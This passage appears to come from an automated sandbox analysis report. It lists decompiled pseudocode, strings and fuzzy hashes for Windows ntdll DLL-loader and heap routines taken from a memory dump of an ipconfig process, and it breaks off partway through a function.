              • API ID:
              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
              • API String ID: 0-188067316
              • Opcode ID: ad86d30b0b9e326b68c367579c8b336d6ffedc1aab75457bb233816e91cea0b2
              • Instruction ID: f465a63f59a9d591f6b37caef5e4faa92ab2d156c67d7a51fdf863de86837b13
              • Opcode Fuzzy Hash: ad86d30b0b9e326b68c367579c8b336d6ffedc1aab75457bb233816e91cea0b2
              • Instruction Fuzzy Hash: 110128321C06409EF625D765E41DFABB7A8DB02F3CF18E06EF0094B652CBE49480C921
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 44%
              			E02EC8E00(void* __ecx) {
              				signed int _v8;
              				char _v12;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr* _t32;
              				intOrPtr _t35;
              				intOrPtr _t43;
              				void* _t46;
              				intOrPtr _t47;
              				void* _t48;
              				signed int _t49;
              				void* _t50;
              				intOrPtr* _t51;
              				signed int _t52;
              				void* _t53;
              				intOrPtr _t55;
              
              				_v8 =  *0x2f8d360 ^ _t52;
              				_t49 = 0;
              				_t48 = __ecx;
              				_t55 =  *0x2f88464; // 0x75150110
              				if(_t55 == 0) {
              					L9:
              					if( !_t49 >= 0) {
              						if(( *0x2f85780 & 0x00000003) != 0) {
              							E02F15510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
              						}
              						if(( *0x2f85780 & 0x00000010) != 0) {
              							asm("int3");
              						}
              					}
              					return E02EDB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
              				}
              				_t47 =  *((intOrPtr*)(__ecx + 0x18));
              				_t43 =  *0x2f87984; // 0x402af0
              				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
              					_t32 =  *((intOrPtr*)(_t48 + 0x28));
              					if(_t48 == _t43) {
              						_t50 = 0x5c;
              						if( *_t32 == _t50) {
              							_t46 = 0x3f;
              							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
              								_t32 = _t32 + 8;
              							}
              						}
              					}
              					_t51 =  *0x2f88464; // 0x75150110
              					 *0x2f8b1e0(_t47, _t32,  &_v12);
              					_t49 =  *_t51();
              					if(_t49 >= 0) {
              						L8:
              						_t35 = _v12;
              						if(_t35 != 0) {
              							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
              								E02EC9B10( *((intOrPtr*)(_t48 + 0x48)));
              								_t35 = _v12;
              							}
              							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
              						}
              						goto L9;
              					}
              					if(_t49 != 0xc000008a) {
              						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
              							if(_t49 != 0xc00000bb) {
              								goto L8;
              							}
              						}
              					}
              					if(( *0x2f85780 & 0x00000005) != 0) {
              						_push(_t49);
              						E02F15510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
              						_t53 = _t53 + 0x1c;
              					}
              					_t49 = 0;
              					goto L8;
              				} else {
              					goto L9;
              				}
              			}





















              Strings
              • minkernel\ntdll\ldrsnap.c, xrefs: 02F0933B, 02F09367
              • Querying the active activation context failed with status 0x%08lx, xrefs: 02F09357
              • LdrpFindDllActivationContext, xrefs: 02F09331, 02F0935D
              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 02F0932A
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
              • API String ID: 0-3779518884
              • Opcode ID: 04cedb8af7a79191e09c922d4c96f358942d7b756a1ae215e11234cd03579b70
              • Instruction ID: be3ad382f4c1a19b3f309da8c4f7cff762036ebefdb8c2b776e58d5bc871f7bd
              • Opcode Fuzzy Hash: 04cedb8af7a79191e09c922d4c96f358942d7b756a1ae215e11234cd03579b70
              • Instruction Fuzzy Hash: AB415CB2EC03199FEB36EAD48F88B79F375AB4068CF25E56DE80457191E7706C81C681
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
              • API String ID: 0-336120773
              • Opcode ID: 79e334f7667d4628a7bff6987214c45daef354b5b51355b72cae15364eb3b486
              • Instruction ID: 4cb28a5ca52a0c9ca3f0caa52c7d7a39679fc28005b31f00313a877b63b98f4f
              • Opcode Fuzzy Hash: 79e334f7667d4628a7bff6987214c45daef354b5b51355b72cae15364eb3b486
              • Instruction Fuzzy Hash: A4312931680120EFD750DF54D885FAB73A9FF01798F15855AFA0ACB250D770A9C0DE64
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 83%
              			E02EA8794(void* __ecx) {
              				signed int _v0;
              				char _v8;
              				signed int _v12;
              				void* _v16;
              				signed int _v20;
              				intOrPtr _v24;
              				signed int _v28;
              				signed int _v32;
              				signed int _v40;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				intOrPtr* _t77;
              				signed int _t80;
              				signed char _t81;
              				signed int _t87;
              				signed int _t91;
              				void* _t92;
              				void* _t94;
              				signed int _t95;
              				signed int _t103;
              				signed int _t105;
              				signed int _t110;
              				signed int _t118;
              				intOrPtr* _t121;
              				intOrPtr _t122;
              				signed int _t125;
              				signed int _t129;
              				signed int _t131;
              				signed int _t134;
              				signed int _t136;
              				signed int _t143;
              				signed int* _t147;
              				signed int _t151;
              				void* _t153;
              				signed int* _t157;
              				signed int _t159;
              				signed int _t161;
              				signed int _t166;
              				signed int _t168;
              
              				_push(__ecx);
              				_t153 = __ecx;
              				_t159 = 0;
              				_t121 = __ecx + 0x3c;
              				if( *_t121 == 0) {
              					L2:
              					_t77 =  *((intOrPtr*)(_t153 + 0x58));
              					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
              						_t122 =  *((intOrPtr*)(_t153 + 0x20));
              						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
              						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
              							L6:
              							if(E02EA934A() != 0) {
              								_t159 = E02F1A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
              								__eflags = _t159;
              								if(_t159 < 0) {
              									_t81 =  *0x2f85780; // 0x0
              									__eflags = _t81 & 0x00000003;
              									if((_t81 & 0x00000003) != 0) {
              										_push(_t159);
              										E02F15510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
              										_t81 =  *0x2f85780; // 0x0
              									}
              									__eflags = _t81 & 0x00000010;
              									if((_t81 & 0x00000010) != 0) {
              										asm("int3");
              									}
              								}
              							}
              						} else {
              							_t159 = E02EA849B(0, _t122, _t153, _t159, _t180);
              							if(_t159 >= 0) {
              								goto L6;
              							}
              						}
              						_t80 = _t159;
              						goto L8;
              					} else {
              						_t125 = 0x13;
              						asm("int 0x29");
              						_push(0);
              						_push(_t159);
              						_t161 = _t125;
              						_t87 =  *( *[fs:0x30] + 0x1e8);
              						_t143 = 0;
              						_v40 = _t161;
              						_t118 = 0;
              						_push(_t153);
              						__eflags = _t87;
              						if(_t87 != 0) {
              							_t118 = _t87 + 0x5d8;
              							__eflags = _t118;
              							if(_t118 == 0) {
              								L46:
              								_t118 = 0;
              							} else {
              								__eflags =  *(_t118 + 0x30);
              								if( *(_t118 + 0x30) == 0) {
              									goto L46;
              								}
              							}
              						}
              						_v32 = 0;
              						_v28 = 0;
              						_v16 = 0;
              						_v20 = 0;
              						_v12 = 0;
              						__eflags = _t118;
              						if(_t118 != 0) {
              							__eflags = _t161;
              							if(_t161 != 0) {
              								__eflags =  *(_t118 + 8);
              								if( *(_t118 + 8) == 0) {
              									L22:
              									_t143 = 1;
              									__eflags = 1;
              								} else {
              									_t19 = _t118 + 0x40; // 0x40
              									_t156 = _t19;
              									E02EA8999(_t19,  &_v16);
              									__eflags = _v0;
              									if(_v0 != 0) {
              										__eflags = _v0 - 1;
              										if(_v0 != 1) {
              											goto L22;
              										} else {
              											_t128 =  *(_t161 + 0x64);
              											__eflags =  *(_t161 + 0x64);
              											if( *(_t161 + 0x64) == 0) {
              												goto L22;
              											} else {
              												E02EA8999(_t128,  &_v12);
              												_t147 = _v12;
              												_t91 = 0;
              												__eflags = 0;
              												_t129 =  *_t147;
              												while(1) {
              													__eflags =  *((intOrPtr*)(0x2f85c60 + _t91 * 8)) - _t129;
              													if( *((intOrPtr*)(0x2f85c60 + _t91 * 8)) == _t129) {
              														break;
              													}
              													_t91 = _t91 + 1;
              													__eflags = _t91 - 5;
              													if(_t91 < 5) {
              														continue;
              													} else {
              														_t131 = 0;
              														__eflags = 0;
              													}
              													L37:
              													__eflags = _t131;
              													if(_t131 != 0) {
              														goto L22;
              													} else {
              														__eflags = _v16 - _t147;
              														if(_v16 != _t147) {
              															goto L22;
              														} else {
              															E02EB2280(_t92, 0x2f886cc);
              															_t94 = E02F69DFB( &_v20);
              															__eflags = _t94 - 1;
              															if(_t94 != 1) {
              															}
              															asm("movsd");
              															asm("movsd");
              															asm("movsd");
              															asm("movsd");
              															 *_t118 =  *_t118 + 1;
              															asm("adc dword [ebx+0x4], 0x0");
              															_t95 = E02EC61A0( &_v32);
              															__eflags = _t95;
              															if(_t95 != 0) {
              																__eflags = _v32 | _v28;
              																if((_v32 | _v28) != 0) {
              																	_t71 = _t118 + 0x40; // 0x3f
              																	_t134 = _t71;
              																	goto L55;
              																}
              															}
              															goto L30;
              														}
              													}
              													goto L56;
              												}
              												_t92 = 0x2f85c64 + _t91 * 8;
              												asm("lock xadd [eax], ecx");
              												_t131 = (_t129 | 0xffffffff) - 1;
              												goto L37;
              											}
              										}
              										goto L56;
              									} else {
              										_t143 = E02EA8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
              										__eflags = _t143;
              										if(_t143 != 0) {
              											_t157 = _v12;
              											_t103 = 0;
              											__eflags = 0;
              											_t136 =  &(_t157[1]);
              											 *(_t161 + 0x64) = _t136;
              											_t151 =  *_t157;
              											_v20 = _t136;
              											while(1) {
              												__eflags =  *((intOrPtr*)(0x2f85c60 + _t103 * 8)) - _t151;
              												if( *((intOrPtr*)(0x2f85c60 + _t103 * 8)) == _t151) {
              													break;
              												}
              												_t103 = _t103 + 1;
              												__eflags = _t103 - 5;
              												if(_t103 < 5) {
              													continue;
              												}
              												L21:
              												_t105 = E02EDF380(_t136, 0x2e71184, 0x10);
              												__eflags = _t105;
              												if(_t105 != 0) {
              													__eflags =  *_t157 -  *_v16;
              													if( *_t157 >=  *_v16) {
              														goto L22;
              													} else {
              														asm("cdq");
              														_t166 = _t157[5] & 0x0000ffff;
              														_t108 = _t157[5] & 0x0000ffff;
              														asm("cdq");
              														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
              														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
              														if(__eflags > 0) {
              															L29:
              															E02EB2280(_t108, 0x2f886cc);
              															 *_t118 =  *_t118 + 1;
              															_t42 = _t118 + 0x40; // 0x3f
              															_t156 = _t42;
              															asm("adc dword [ebx+0x4], 0x0");
              															asm("movsd");
              															asm("movsd");
              															asm("movsd");
              															asm("movsd");
              															_t110 = E02EC61A0( &_v32);
              															__eflags = _t110;
              															if(_t110 != 0) {
              																__eflags = _v32 | _v28;
              																if((_v32 | _v28) != 0) {
              																	_t134 = _v20;
              																	L55:
              																	E02F69D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
              																}
              															}
              															L30:
              															 *_t118 =  *_t118 + 1;
              															asm("adc dword [ebx+0x4], 0x0");
              															E02EAFFB0(_t118, _t156, 0x2f886cc);
              															goto L22;
              														} else {
              															if(__eflags < 0) {
              																goto L22;
              															} else {
              																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
              																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
              																	goto L22;
              																} else {
              																	goto L29;
              																}
              															}
              														}
              													}
              													goto L56;
              												}
              												goto L22;
              											}
              											asm("lock inc dword [eax]");
              											goto L21;
              										}
              									}
              								}
              							}
              						}
              						return _t143;
              					}
              				} else {
              					_push( &_v8);
              					_push( *((intOrPtr*)(__ecx + 0x50)));
              					_push(__ecx + 0x40);
              					_push(_t121);
              					_push(0xffffffff);
              					_t80 = E02ED9A00();
              					_t159 = _t80;
              					if(_t159 < 0) {
              						L8:
              						return _t80;
              					} else {
              						goto L2;
              					}
              				}
              				L56:
              			}












































              0x02ea88f3
              0x00000000
              0x02ea88d5
              0x00000000
              0x02ea88b2
              0x02ea88c9
              0x00000000
              0x02ea88c9
              0x02ea887f
              0x02ea886a
              0x02ea8857
              0x02ea8852
              0x02ea88bf
              0x02ea88bf
              0x02ea87aa
              0x02ea87ad
              0x02ea87ae
              0x02ea87b4
              0x02ea87b5
              0x02ea87b6
              0x02ea87b8
              0x02ea87bd
              0x02ea87c1
              0x02ea87f4
              0x02ea87fa
              0x00000000
              0x00000000
              0x00000000
              0x02ea87c1
              0x00000000

              Strings
              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 02EF9C18
              • minkernel\ntdll\ldrsnap.c, xrefs: 02EF9C28
              • LdrpDoPostSnapWork, xrefs: 02EF9C1E
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
              • API String ID: 0-1948996284
              • Opcode ID: 4ece42a86cebd24d8516a92ab5b0229f5e98d31e4716057724280c338236c90e
              • Instruction ID: 6e0e3d282e75eef0b2c3760d0c6de5d727e884e86e8bc2e459553cf478b12ba4
              • Opcode Fuzzy Hash: 4ece42a86cebd24d8516a92ab5b0229f5e98d31e4716057724280c338236c90e
              • Instruction Fuzzy Hash: 4891E571A80219DFDB18DF58C8A4ABAB7B6FF44318B95D069E945AF241DB30FD01CB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E02EA7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
              				char _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				char _v24;
              				signed int _t73;
              				void* _t77;
              				char* _t82;
              				char* _t87;
              				signed char* _t97;
              				signed char _t102;
              				intOrPtr _t107;
              				signed char* _t108;
              				intOrPtr _t112;
              				intOrPtr _t124;
              				intOrPtr _t125;
              				intOrPtr _t126;
              
              				_t107 = __edx;
              				_v12 = __ecx;
              				_t125 =  *((intOrPtr*)(__ecx + 0x20));
              				_t124 = 0;
              				_v20 = __edx;
              				if(E02EACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
              					_t112 = _v8;
              				} else {
              					_t112 = 0;
              					_v8 = 0;
              				}
              				if(_t112 != 0) {
              					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
              						_t124 = 0xc000007b;
              						goto L8;
              					}
              					_t73 =  *(_t125 + 0x34) | 0x00400000;
              					 *(_t125 + 0x34) = _t73;
              					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
              						goto L3;
              					}
              					 *(_t125 + 0x34) = _t73 | 0x01000000;
              					_t124 = E02E9C9A4( *((intOrPtr*)(_t125 + 0x18)));
              					if(_t124 < 0) {
              						goto L8;
              					} else {
              						goto L3;
              					}
              				} else {
              					L3:
              					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
              						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
              						L8:
              						return _t124;
              					}
              					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
              						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
              							goto L5;
              						}
              						_t102 =  *0x2f85780; // 0x0
              						if((_t102 & 0x00000003) != 0) {
              							E02F15510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
              							_t102 =  *0x2f85780; // 0x0
              						}
              						if((_t102 & 0x00000010) != 0) {
              							asm("int3");
              						}
              						_t124 = 0xc0000428;
              						goto L8;
              					}
              					L5:
              					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
              						goto L8;
              					}
              					_t77 = _a4 - 0x40000003;
              					if(_t77 == 0 || _t77 == 0x33) {
              						_v16 =  *((intOrPtr*)(_t125 + 0x18));
              						if(E02EB7D50() != 0) {
              							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              						} else {
              							_t82 = 0x7ffe0384;
              						}
              						_t108 = 0x7ffe0385;
              						if( *_t82 != 0) {
              							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
              								if(E02EB7D50() == 0) {
              									_t97 = 0x7ffe0385;
              								} else {
              									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
              								}
              								if(( *_t97 & 0x00000020) != 0) {
              									E02F17016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
              								}
              							}
              						}
              						if(_a4 != 0x40000003) {
              							L14:
              							_t126 =  *((intOrPtr*)(_t125 + 0x18));
              							if(E02EB7D50() != 0) {
              								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              							} else {
              								_t87 = 0x7ffe0384;
              							}
              							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
              								if(E02EB7D50() != 0) {
              									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
              								}
              								if(( *_t108 & 0x00000020) != 0) {
              									E02F17016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
              								}
              							}
              							goto L8;
              						} else {
              							_v16 = _t125 + 0x24;
              							_t124 = E02ECA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
              							if(_t124 < 0) {
              								E02E9B1E1(_t124, 0x1490, 0, _v16);
              								goto L8;
              							}
              							goto L14;
              						}
              					} else {
              						goto L8;
              					}
              				}
              			}

              Strings
              • minkernel\ntdll\ldrmap.c, xrefs: 02EF98A2
              • Could not validate the crypto signature for DLL %wZ, xrefs: 02EF9891
              • LdrpCompleteMapModule, xrefs: 02EF9898
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
              • API String ID: 0-1676968949
              • Opcode ID: d5271ccecbfeb951ca065bfec10795d72ce6b9055f28cb437e07481544a9b3a4
              • Instruction ID: 7d7dd13b99b18324c7f8e56c56f74ceb846df74cb1ac9bb5cdd38f13e7bc01a8
              • Opcode Fuzzy Hash: d5271ccecbfeb951ca065bfec10795d72ce6b9055f28cb437e07481544a9b3a4
              • Instruction Fuzzy Hash: A75103316807849BEB21CB68C954B6ABBE4AF41318F14E59AE9919F7D2C730FD00CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E02E9E620(void* __ecx, short* __edx, short* _a4) {
              				char _v16;
              				char _v20;
              				intOrPtr _v24;
              				char* _v28;
              				char _v32;
              				char _v36;
              				char _v44;
              				signed int _v48;
              				intOrPtr _v52;
              				void* _v56;
              				void* _v60;
              				char _v64;
              				void* _v68;
              				void* _v76;
              				void* _v84;
              				signed int _t59;
              				signed int _t74;
              				signed short* _t75;
              				signed int _t76;
              				signed short* _t78;
              				signed int _t83;
              				short* _t93;
              				signed short* _t94;
              				short* _t96;
              				void* _t97;
              				signed int _t99;
              				void* _t101;
              				void* _t102;
              
              				_t80 = __ecx;
              				_t101 = (_t99 & 0xfffffff8) - 0x34;
              				_t96 = __edx;
              				_v44 = __edx;
              				_t78 = 0;
              				_v56 = 0;
              				if(__ecx == 0 || __edx == 0) {
              					L28:
              					_t97 = 0xc000000d;
              				} else {
              					_t93 = _a4;
              					if(_t93 == 0) {
              						goto L28;
              					}
              					_t78 = E02E9F358(__ecx, 0xac);
              					if(_t78 == 0) {
              						_t97 = 0xc0000017;
              						L6:
              						if(_v56 != 0) {
              							_push(_v56);
              							E02ED95D0();
              						}
              						if(_t78 != 0) {
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
              						}
              						return _t97;
              					}
              					E02EDFA60(_t78, 0, 0x158);
              					_v48 = _v48 & 0x00000000;
              					_t102 = _t101 + 0xc;
              					 *_t96 = 0;
              					 *_t93 = 0;
              					E02EDBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
              					_v36 = 0x18;
              					_v28 =  &_v44;
              					_v64 = 0;
              					_push( &_v36);
              					_push(0x20019);
              					_v32 = 0;
              					_push( &_v64);
              					_v24 = 0x40;
              					_v20 = 0;
              					_v16 = 0;
              					_t97 = E02ED9600();
              					if(_t97 < 0) {
              						goto L6;
              					}
              					E02EDBB40(0,  &_v36, L"InstallLanguageFallback");
              					_push(0);
              					_v48 = 4;
              					_t97 = L02E9F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
              					if(_t97 >= 0) {
              						if(_v52 != 1) {
              							L17:
              							_t97 = 0xc0000001;
              							goto L6;
              						}
              						_t59 =  *_t78 & 0x0000ffff;
              						_t94 = _t78;
              						_t83 = _t59;
              						if(_t59 == 0) {
              							L19:
              							if(_t83 == 0) {
              								L23:
              								E02EDBB40(_t83, _t102 + 0x24, _t78);
              								if(L02EA43C0( &_v48,  &_v64) == 0) {
              									goto L17;
              								}
              								_t84 = _v48;
              								 *_v48 = _v56;
              								if( *_t94 != 0) {
              									E02EDBB40(_t84, _t102 + 0x24, _t94);
              									if(L02EA43C0( &_v48,  &_v64) != 0) {
              										 *_a4 = _v56;
              									} else {
              										_t97 = 0xc0000001;
              										 *_v48 = 0;
              									}
              								}
              								goto L6;
              							}
              							_t83 = _t83 & 0x0000ffff;
              							while(_t83 == 0x20) {
              								_t94 =  &(_t94[1]);
              								_t74 =  *_t94 & 0x0000ffff;
              								_t83 = _t74;
              								if(_t74 != 0) {
              									continue;
              								}
              								goto L23;
              							}
              							goto L23;
              						} else {
              							goto L14;
              						}
              						while(1) {
              							L14:
              							_t27 =  &(_t94[1]); // 0x2
              							_t75 = _t27;
              							if(_t83 == 0x2c) {
              								break;
              							}
              							_t94 = _t75;
              							_t76 =  *_t94 & 0x0000ffff;
              							_t83 = _t76;
              							if(_t76 != 0) {
              								continue;
              							}
              							goto L23;
              						}
              						 *_t94 = 0;
              						_t94 = _t75;
              						_t83 =  *_t75 & 0x0000ffff;
              						goto L19;
              					}
              				}
              			}

              Strings
              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 02E9E68C
              • @, xrefs: 02E9E6C0
              • InstallLanguageFallback, xrefs: 02E9E6DB
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
              • API String ID: 0-1757540487
              • Opcode ID: a0968ef7eb2229c577e932c5731afe88ecdfaa931ce8f08330fb988eed09d793
              • Instruction ID: 505d9a906127f47b87424c81ba0cc364af81c59d33ee1531ff99b98d014fe2a0
              • Opcode Fuzzy Hash: a0968ef7eb2229c577e932c5731afe88ecdfaa931ce8f08330fb988eed09d793
              • Instruction Fuzzy Hash: A451C2725443459BCB14DF24C440BABB3E9BF98719F45992EFA86E7240F734D904CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E02ECFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
              				char _v5;
              				signed int _v8;
              				signed int _v12;
              				char _v16;
              				char _v17;
              				char _v20;
              				signed int _v24;
              				char _v28;
              				char _v32;
              				signed int _v40;
              				void* __ecx;
              				void* __edi;
              				void* __ebp;
              				signed int _t73;
              				intOrPtr* _t75;
              				signed int _t77;
              				signed int _t79;
              				signed int _t81;
              				intOrPtr _t83;
              				intOrPtr _t85;
              				intOrPtr _t86;
              				signed int _t91;
              				signed int _t94;
              				signed int _t95;
              				signed int _t96;
              				signed int _t106;
              				signed int _t108;
              				signed int _t114;
              				signed int _t116;
              				signed int _t118;
              				signed int _t122;
              				signed int _t123;
              				void* _t129;
              				signed int _t130;
              				void* _t132;
              				intOrPtr* _t134;
              				signed int _t138;
              				signed int _t141;
              				signed int _t147;
              				intOrPtr _t153;
              				signed int _t154;
              				signed int _t155;
              				signed int _t170;
              				void* _t174;
              				signed int _t176;
              				signed int _t177;
              
              				_t129 = __ebx;
              				_push(_t132);
              				_push(__esi);
              				_t174 = _t132;
              				_t73 =  !( *( *(_t174 + 0x18)));
              				if(_t73 >= 0) {
              					L5:
              					return _t73;
              				} else {
              					E02EAEEF0(0x2f87b60);
              					_t134 =  *0x2f87b84; // 0x77ad7b80
              					_t2 = _t174 + 0x24; // 0x24
              					_t75 = _t2;
              					if( *_t134 != 0x2f87b80) {
              						_push(3);
              						asm("int 0x29");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						_push(0x2f87b60);
              						_t170 = _v8;
              						_v28 = 0;
              						_v40 = 0;
              						_v24 = 0;
              						_v17 = 0;
              						_v32 = 0;
              						__eflags = _t170 & 0xffff7cf2;
              						if((_t170 & 0xffff7cf2) != 0) {
              							L43:
              							_t77 = 0xc000000d;
              						} else {
              							_t79 = _t170 & 0x0000000c;
              							__eflags = _t79;
              							if(_t79 != 0) {
              								__eflags = _t79 - 0xc;
              								if(_t79 == 0xc) {
              									goto L43;
              								} else {
              									goto L9;
              								}
              							} else {
              								_t170 = _t170 | 0x00000008;
              								__eflags = _t170;
              								L9:
              								_t81 = _t170 & 0x00000300;
              								__eflags = _t81 - 0x300;
              								if(_t81 == 0x300) {
              									goto L43;
              								} else {
              									_t138 = _t170 & 0x00000001;
              									__eflags = _t138;
              									_v24 = _t138;
              									if(_t138 != 0) {
              										__eflags = _t81;
              										if(_t81 != 0) {
              											goto L43;
              										} else {
              											goto L11;
              										}
              									} else {
              										L11:
              										_push(_t129);
              										_t77 = E02EA6D90( &_v20);
              										_t130 = _t77;
              										__eflags = _t130;
              										if(_t130 >= 0) {
